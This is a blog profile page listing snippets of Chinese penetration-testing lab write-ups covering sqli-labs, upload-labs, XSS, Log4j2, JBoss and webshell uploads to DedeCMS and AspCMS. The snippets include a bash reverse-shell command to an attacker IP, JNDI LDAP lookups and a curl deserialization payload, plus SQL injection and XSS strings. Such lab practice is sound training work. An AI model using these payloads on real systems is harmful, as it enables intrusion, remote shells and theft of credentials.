自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(32)
  • 收藏
  • 关注

原创 aspcms webshell漏洞复现

影响的文件地址为/config/AspCms_Config.asp访问到。点击【扩展功能】【幻灯片设置】点击【保存】开启代理进行抓包。在后边修改连接木马密码是a。

2024-09-17 13:30:03 126

原创 dedecms(四种webshell姿势)

步骤一:访问目标靶场其思路为 dedecms 后台可以直接上传任意文件,可以通过文件管理器上传php文件获取webshell来到靶场进入后台登录来到这里上传一个一句话木马文件拿去蚁剑连接就ok了。

2024-09-17 13:13:01 304

原创 seafaring靶场渗透测试

进来这里有个框尝试xss没有那咱们就来试试搜索行注入这里有东西说明闭合成功,接着就order by 有三列三个地方都有回显查看数据库这里查表发现只有两个先去看看admin先来看看列然后看用户密码,这里密码直接显示出来了。

2024-09-13 14:58:47 556

原创 CISP-PTE CMS sqlgun靶场

输入 -1' union select 1,2,3# 有回显可以查看数据库。sql靶场有个搜索框先点一下go,有回显说明存在漏洞。查询它的数据这里admin用户的密码是md5加密。有个phpinfo.php点进去可以看到路径。然后扫描ip目录发现没有后台登录的地方。然后在这里尝试sql注入。来到根目录有个flag。然后查询数据库,用户。

2024-09-13 11:13:37 579

原创 CTF-综合靶场

扫描端口进入靶场然后就扫IP下的目录。

2024-09-11 16:52:12 483

原创 Vulhub Apache Airflow (CVE-2020-11978)

再点击执行按钮,在Configuration JSON中输入:{"message":"'\";运行完,可以看到成功反弹shell,可以命令执行了。来到目录下初始化数据库。

2024-09-08 16:09:02 333

原创 Jboss远程代码执行漏洞(CVE-2017-12149)

/反弹shell命令,注意替换为自己的。浏览器访问跟上一个一模一样页面。//base64加密。

2024-09-08 15:21:36 218

原创 Jboss远程代码执行漏洞(CVE-2017-7504)

监听启动后再执行下述指令:curl http://192.168.75.146:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @poc.ser。首先准备好生成payload的工具:ysoserial.jar。然后准备好反弹shell的命令,需要对其进行base64加密。//反弹shell命令,注意替换为自己的。显示如下页面说明有漏洞。//base64加密。

2024-09-08 14:58:05 453

原创 代码执行漏洞-Log4j2漏洞 vulhub CVE-2021-44228

action=${jndi:ldap://192.168.10.235:1389/g3fjso}${jndi:ldap://192.168.10.235:8888/uma7pn}JDNI项⽬地址 https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0。# 反弹shell bash -i >& /dev/tcp/192.168.10.235/8888 0>&1。步骤一:执行以下命令启动靶场环境并在浏览器访问!

2024-09-08 13:57:56 329

原创 中间件解析漏洞

在iis6.x中,.asp文件夹中的任意文件都会被当做asp文件去执行。在wwwroot下新建一个x.asp里边写入jpg文件这里到物理机访问文件。

2024-09-05 19:14:47 876

原创 Tomato靶场通关攻略

利用ssh连接写入木马 ssh '

2024-09-04 14:43:35 789

原创 文件包含PHP伪协议利用方法

首先我们需要把配置文件php.ini在 php.ini ⾥有两个重要的参数 allow_url_fopen 、allow_url_include;allow_url_fopen:默认值是 ON。允许 url ⾥的封装协议访问⽂件;allow_url_include:默认值是 OFF。不允许包含 url ⾥的封装协议包含⽂件;

2024-09-03 19:40:11 675

原创 pikachu文件包含漏洞靶场(本地文件包含+远程文件包含关卡)

1.来到关卡随便点击一个提交可以发现这里可以读取文件这是1.txt内容能读取到上一级文件那么也就可以读取本地文件上传一个jpg文件拿去连就ok了。

2024-09-03 19:04:41 412

原创 .hackme靶机通关攻略

上传一句话木马 <?> 写入1.php上传后去看它的目录里边有没有。有就说明写进去了然后去连接webshell。可以看到密码是加密后的拿到密码进行解密。(这里我用的superadmin用户)回去登录进去看见有个上传文件的地方。只有一个框框那就来试试sql注入。这里查看users表的用户和密码。通过御剑扫描到IP进入尝试。进来点一下提交出来书名。

2024-09-03 18:04:01 230

原创 sqli-labs靶场(56-60)

id=1") and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='4cnqwjiczk' limit 0,1),0x7e),1)-- q 查列。然后就是key的值了。

2024-09-02 10:30:33 869

原创 sqli-labs靶场(51-55)

这关跟50关一样采用报错来查看Less-51/?查表/Less-51/?查列/Less-51/?查询username,password/Less-51/?

2024-09-01 13:54:39 1137

原创 upload-labs通关攻略

上传过后访问发现不能解析,这里有一个局限的点,在.user.ini 中使用这条配置,需要在同目录下的其他.php 文件中包含配置中所指定的文件,也就是说需要该目录下存在.php 文件。个人的理解:因为需要php文件去加载这个.user.ini配置文件。浏览器访问这个php文件成功将shell.php写入到它的文件夹里就成功了。利用命令将php文件和png图片结合成shell.jpg图片。这里上传php文件它说不允许上传这些后缀的文件。给文件名改一个大写的字母就能成功上传。这里上传php文件说不允许上传。

2024-08-30 18:07:00 835

原创 sqli-labs靶场通过(45-50)

这里页面不一样输入?sort=1这里=2发现位置不一样用报错注入可以看到数据库。

2024-08-29 19:24:12 708

原创 vulhub xxe靶机练习——XXE漏洞渗透

首先咱们先根据它的网址进行目录扫描发现除了index.html还有一个.txt。咱们复制找个解码工具去解码进行查看发现它密码被加密了一看是md5加密。发送到重放器发现有回显点咱们在这里输入语句得到一大串编码后的数据。来到浏览器访问自己的ip加上这个php文件然后就得到flag了。它是base32加密来到解密工具进行解密发现还是加密的。进入这个txt文件发现它还有目录咱们进去看看。一看是base64加密再次解密得到地址。发现登录界面输入用户密码登录抓包。查看页面源代码得到一个加密的语句。

2024-08-29 18:01:17 360

原创 sqli-labs靶场(41-45)

sql-labs第41关(GET请求-基于盲注-数值型-堆叠)sql-labs第42关(POST请求-基于错误-字符型-堆叠)sql-labs第43关(POST请求-基于错误-字符型-堆叠变形)sql-labs第44关(POST请求-基于错误-字符型-堆叠-盲注)sql-labs第45关(POST请求-基于错误-字符型-堆叠-盲注)

2024-08-28 19:12:10 625

原创 CTFHub技能树SSRF

这里进入文档然后添加提交查询的按钮并提交一个文件(文件里写一句话木马)提交抓包。首先来到127.0.0.1:80的flag.php发现有个输入框。在文本编辑器替换%0A并在最后加上%0D%0A。直接在网址里拼接flag.php找到flag。还是一样的流程抓包进去修改数据后进行编码。这里添加要扫描的端口成功扫到flag。二次编码后输入进去就得到了flag。二次编码后提交,成功得到flag。修改后在在线url编码进行编码。查看页面源代码发现藏在这里。这里写入key发现不行。这里需要用到抓包工具。

2024-08-27 16:41:27 575

原创 xss-labs靶场通关攻略

alert(1)

2024-08-24 14:27:49 650

原创 sqli-labs靶场通过攻略(21~40)

第二十七关

2024-08-22 20:04:48 1248

原创 Pikachu 漏洞练习平台 pika~pika~---Cross-Site Scripting通关攻略

alert(1)</script>,名字随便输一个然后点提交。进来发现它是一个留言板 输入语句<script>alert(1)</script>成功弹出。<script>alert(1)</script>输入这条语句弹出弹窗就对了。登录后输入语句<script>alert(1)

2024-08-22 18:45:09 604

原创 MongoDB手工注入

这里闭合方式和平常不同然后回显点。墨者靶场开启环境进入网址。再来查看数据库中的所有表。然后查看出表的列和数据。

2024-08-20 19:14:55 191

原创 PostGREsql手工注入

判断回显点这里回显点不一样需要你判断哪个需要用‘’单引号包起来。然后判断列数这里到order by 5页面不正常。然后看到用户和密码后去MD5在线解密中去解密。这里随便解密一个去登录就完成了。还是先来看是否存在漏洞。紧接着就是查看表中内容。

2024-08-20 18:55:53 259

原创 Oracle手工注入

这里写and 1=2页面不正常说明存在sql注入。首先还是老样子来判断它是否存在sql注入。然后再去网页找md5解密进行密码解密。这里3的时候页面不正常说明只有两列。查看除zhong和hu之外的数据。然后返回登录页面进行登录就完成了。再查看除了上边这个表之外别的表。

2024-08-20 18:46:51 383

原创 MSSQLILABS靶场第一关

再查看别的列/less-1.asp?id=-1' group by id having 1=1 --+这里order by 4报错说明有三列。这里查看完回显点直接看用户跟数据库名。再查看一下数据库版本信息。还是一样首先判断闭合方式。

2024-08-20 18:23:22 432

原创 Access环境搭建和手工注入

然后在查询它的用户名和密码union select 1,user_name,password,4,5,6,7 from administrator。链接:https://pan.baidu.com/s/1-rhSSuOGZ9GOPJBbPWeN7Q?进入到后台管理界面用前边查出来的用户密码登录 密码一般用的都是md5加密直接在网页上在线解密。进来后随便点个新闻访问可以看到有id=几那就可以确定有漏洞。一直到order by 8 页面报错说明有七列。用工具扫描它的后台登录在那个目录下。首先查看它的正常页面。

2024-08-20 13:35:45 455

原创 AI-Web1.0靶场通关攻略

然后再根据数据库查看表名 -1' union select 1,table_name,3 from information_schema.columns where table_schema='aiweb1' #再根据表名查看列 -1' union select 1,column_name,3 from information_schema.columns where table_name='user' #然后进入kali虚拟机扫描目录文件。扫描到它底下的目录进入浏览器访问。查看php文件发现绝对路径。

2024-08-19 18:34:29 115

原创 sqli-labs靶场通关攻略(1~20)

id=-1'union select 1,group_concat(table_name),3 frominformation_schema.tables where table_schema='security' --+id=-1' union select 1,2,group_concat(id,username) from users --+前边id改成-1在后边加入联合查询的回显点localhost/Less-1/?id=-1'union select 1,2,3 --+然后再查看数据库的列。

2024-08-14 19:39:23 378

原创 CTF -Web系列-信息漏洞

复制文件.txt回到网站拼接成功找到flag返回到CTFHub提交。进入文件就可以看到flag然后复制回去提交就ok了。下载后进入文件找到flag复制粘贴回去提交。进入网站拼接index.php.bak。进入网站拼接index.php.swp。然后进入虚拟机kali输入命令进行克隆。进入后直接git show查看。进入发现里边只有.txt文件。在网站后拼接就可以直接显示了。进入dist下的文件.git。回到网址拼接www.zip。把.txt文件前边空格删掉。成功找到www.zip。然后复制粘贴提交回去。

2024-08-13 20:42:59 581 1

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除